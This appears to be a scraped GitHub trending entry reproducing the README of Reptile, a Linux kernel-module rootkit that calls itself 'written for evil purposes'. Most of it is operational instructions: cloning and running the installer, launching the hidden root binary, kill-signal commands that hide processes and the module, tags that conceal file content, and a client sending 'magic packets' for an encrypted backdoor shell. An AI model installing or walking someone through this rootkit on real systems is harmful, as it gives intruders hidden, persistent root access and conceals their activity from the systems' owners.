f0rb1dd3n / Reptile
- среда, 23 мая 2018 г. в 00:17:29
C
LKM Linux rootkit
Reptile is a LKM rootkit written for evil purposes that runs on kernel 2.6.x/3.x/4.x.
Would you like to see his fatality?
apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install
./installer.sh remove
Binaries will be copied to /reptile
folder (or any name you chose), that will be hidden by Reptile.
Just run: /reptile/reptile_r00t
kill -50 0
kill -49 <PID>
kill -51 0
and all content between the tags will be hiddenExample:
#<reptile>
content to hide
#</reptile>
You use the client to send magic packets and get your full TTY encrypted shell!
More informations: Reptile Shell
Some functions of this module is based on another rootkits. Please see the references!